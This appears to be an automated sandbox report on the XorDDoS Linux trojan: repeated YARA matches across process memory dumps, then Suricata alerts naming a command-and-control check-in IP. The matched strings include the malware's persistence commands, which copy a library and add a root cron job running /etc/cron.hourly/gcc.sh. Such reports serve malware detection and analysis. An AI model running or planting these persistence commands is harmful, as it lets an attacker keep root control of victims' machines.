6288.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6486.1.0000000008048000.00000000080cf000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6486.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6af99:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6486.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_0eb147ca	unknown	unknown	0x2960:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55 0x29e3:$a: 83 45 F0 01 8B 45 F0 89 45 E8 8B 45 E8 83 C4 18 5F 5D C3 55
6486.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x8ed2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x8f3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6486.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_ba961ed2	unknown	unknown	0x26d8:$a: F8 C9 C3 55 89 E5 83 EC 38 C7 45 F8 FF FF FF FF C7 45 FC FF FF
6486.1.0000000008048000.00000000080cf000.r-x.sdmp	Linux_Trojan_Xorddos_2084099a	unknown	unknown	0x79d3:$a: 8B 45 FC 8B 50 18 8B 45 08 89 50 18 8B 45 FC 8B 40 08 85 C0
6486.1.0000000008048000.00000000080cf000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x863fb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x8644d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x6ad30:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x6ae29:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
Process Memory Space: HaJTqGiPpD PID: 6229	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6229	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xd3d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xe1a:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6231	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6231	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1559:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1636:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6232	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6232	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6233	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6233	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6263	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6263	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6266	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6266	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x32eb:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x33c8:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6269	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6269	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x361b:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x36f8:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6272	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6272	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xbc4:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xca1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6274	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6274	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6280	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6280	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x6662:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x673f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6283	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6283	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x47da:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x48b7:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6285	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6285	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6288	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6288	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x4f67:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x5044:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6291	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6291	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1dca:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1ea7:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6298	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6298	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x512a:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x5207:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6300	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6300	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6303	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6303	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2dd7:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2eb4:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6306	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6306	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x54ea:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x55c7:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6310	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6310	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x47e2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x48bf:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6328	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6328	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x4bd5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x4cb2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6331	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6331	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xbc4:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xca1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6333	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6333	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x4330:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x440d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6336	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6336	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1775:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1852:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6338	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6338	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x32f1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x33ce:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6345	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6345	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x464f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x472c:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6348	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6348	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6351	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6351	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x85f2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x86cf:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6353	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6353	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6356	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6356	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2553:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2630:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6364	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6364	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x112d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x120a:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6367	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6367	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6370	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6370	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3229:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3306:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6372	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6372	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8849:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x8926:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6375	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6375	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x85f2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x86cf:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6381	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6381	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x63b0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x648d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6384	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6384	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6387	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6387	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xbc4:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xca1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6389	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6389	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8627:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x8704:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6392	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6392	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x7443:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x7520:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6398	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6398	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6401	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6401	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x4b35:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x4c12:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6404	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6404	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x4753:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x4830:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6406	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6406	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6409	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6409	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x32f1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x33ce:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6418	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6418	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x447c:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x4559:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6421	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6421	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x40e3:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x41c0:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6423	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6423	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x7049:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x7126:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6426	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6426	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6429	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6429	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8a5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x982:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6435	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6435	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x20d4:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x21b1:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6438	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6438	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2d82:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2e5f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6440	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6440	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x46d8:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x47b5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6443	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6443	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x1db5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x1e92:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6445	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6445	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x4f60:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x503d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6452	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6452	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x49e5:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x4ac2:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6454	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6454	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x46c6:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x47a3:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6457	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6457	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8934:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x8a11:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6461	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6461	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x20cd:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x21aa:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6463	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6463	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x96d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xa4a:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6469	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6469	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8911:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x89ee:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6472	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6472	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8853:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x8930:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6474	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6474	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x3b1d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x3bfa:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6477	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6477	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0xd46:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0xe23:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6480	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6480	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x2d82:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x2e5f:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6486	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6486	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8946:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x8a23:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6491	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6491	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x47fa:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x48d7:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6493	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6493	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8627:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x8704:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6496	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6496	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x8955:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x8a32:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6499	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6499	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x112d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x120a:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Process Memory Space: HaJTqGiPpD PID: 6506	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
Process Memory Space: HaJTqGiPpD PID: 6506	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x894d:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73 0x8a2a:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
Click to see the 737 entries

Suricata Signatures

ET MALWARE Wapack Labs Sinkhole DNS Reply - Source IP: 8.8.8.8 - Destination IP: 192.168.2.23

Timestamp:	2024-08-20T15:33:13.222020+0200
SID:	2021022
Severity:	1
Source Port:	53
Destination Port:	45489
Protocol:	UDP
Classtype:	A Network Trojan was detected

ET MALWARE DDoS.XOR Checkin via HTTP - Source IP: 192.168.2.23 - Destination IP: 23.253.46.64

